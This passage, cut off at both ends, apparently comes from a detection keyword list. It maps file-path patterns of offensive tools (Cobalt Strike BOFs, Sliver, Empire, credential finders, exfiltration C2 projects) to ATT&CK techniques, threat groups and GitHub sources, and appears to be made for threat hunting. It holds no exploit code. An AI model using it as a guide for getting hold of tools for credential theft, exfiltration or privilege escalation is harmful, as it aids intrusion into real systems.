- Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Seatbelt/Commands*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*/SeBackupPrivilege.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z -*/secinject.c*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*/SecretFinder.git*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*/secretsdump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/sec-tools/litefuzz*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*/SeeYouCM-Thief*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*/self_delete.cna*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*/SeManageVolumeExploit.git*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*/SeriousSam.sln*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/server/c2/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/server/common/stagers.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/ServerC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/ServerC2.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/servers/dns_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/servers/icmp_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/servers/smb_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/serverscan/CobaltStrike*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/serverscan_Air*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/serverscan_pro*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForLinux/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForWindows/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForWindows/PE*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServiceMove-BOF/*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*/ServiceName:TokenDriver*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/Services/TransitEXE.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/servicetags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SessionSearcher.exe*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/SetProcessInjection.git*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*/setuserpass.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/setuserpass.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/sfp_openphish.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/sfp_spider.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/sh_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/s-h-3-l-l/*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*/shadowcoerce.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ShadowForgeC2*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*/ShadowSpray.git*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*/ShadowSpray/*.cs*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*/share/windows-resources/wce*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - 